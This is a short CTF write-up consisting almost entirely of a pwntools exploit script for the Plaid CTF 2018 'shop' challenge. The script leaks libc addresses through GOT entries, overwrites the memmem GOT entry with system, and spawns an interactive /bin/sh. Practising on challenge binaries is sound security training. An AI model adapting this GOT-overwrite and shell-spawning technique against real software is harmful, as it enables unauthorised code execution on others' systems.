Write-up/Pwnable
[Plaid CTF 2018] shop python solve code 2
MyriaBreak
2018. 5. 22. 23:38
code version 2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 | #!/usr/bin/env python from pwn import * import string lib = ELF("/lib/x86_64-linux-gnu/libc.so.6") #lib = ELF("./libc.so.6") elf = ELF("./shop") conn = process("./shop") def AddItem(item, description="nothing", price="1"): conn.sendlineafter("> ","a") conn.sendline(item) conn.sendline(description) conn.sendline(price) def CheckoutAllItem(item_IDs): conn.sendline("c") conn.sendline(item_IDs) result = conn.recvuntil("TOTAL: $") total = conn.recvuntil(".") return (result, total[:-1]) def ListItem(): conn.sendlineafter("> ", "l") list = conn.recvuntil("> ") return list def RenameShop(name): conn.sendline("n") conn.sendlineafter('Enter your shop name:', name) conn.sendlineafter('Enter your shop name:', "myria") for i in range(0,33): AddItem(str(i)) All_ItemIDs = cyclic(0x10000, alphabet='0123456789abcdef', n=4) result, total = CheckoutAllItem(All_ItemIDs) log.info("Checkout : %s" % total) ### fread leak! fread_got = elf.got["fread"] memmem_got = elf.got["memmem"] log.info("fread.got : 0x%x" % fread_got) RenameShop(p64(fread_got-44)) leak = ListItem().split("\n")[-2].split(" - ")[1] leak = leak+"\x00"*(8-len(leak)) fread_addr = u64(leak) ### stdin leak! stdin = 0x6020D0 RenameShop(p64(stdin-44)) leak = ListItem().split("\n")[-2].split(" - ")[1] leak = leak+"\x00"*(8-len(leak)) stdin_addr = u64(leak) ### stdout leak! stdout = 0x6020C0 RenameShop(p64(stdout-12)) leak = ListItem().split("\n")[-2].split(":")[0] leak = leak+"\x00"*(8-len(leak)) stdout_addr = u64(leak) fread_offset = lib.symbols['fread'] memmem_offset = lib.symbols['memmem'] system_offset = lib.symbols['system'] stdout_offset = lib.symbols['_IO_2_1_stdout_'] stdin_offset = lib.symbols['_IO_2_1_stdin_'] base_addr = fread_addr - fread_offset memmem_addr = base_addr + memmem_offset system_addr = base_addr + system_offset stdin_addr = base_addr + stdin_offset log.info("%9s : 0x%x" % ("base_addr", base_addr)) log.info("%9s : 0x%x" % ("fread",fread_addr)) log.info("%9s : 0x%x" % ("memmem",memmem_addr)) log.info("%9s : 0x%x" % ("system",system_addr)) log.info("%9s : 0x%x" % ("stdout",stdout_addr)) log.info("%9s : 0x%x" % ("stdin",stdin_addr)) print("") #malloc ghost = stdout-8 RenameShop(p64(ghost)+"@@@@"+"A") result, total = CheckoutAllItem(All_ItemIDs[4:] + p64(stdout_addr)[:4]) log.info("Checkout : %s" % total) print(result) exploit = "\x00"*8 exploit += p64(stdout_addr) exploit += p64(0x0) exploit += p64(stdin_addr) exploit += p64(0x0) exploit += p64(0x0)*32 ##checkout item exploit += p64(memmem_got) RenameShop(exploit) RenameShop(p64(system_addr)) conn.sendline("c") conn.sendline("/bin/sh") conn.interactive() | cs |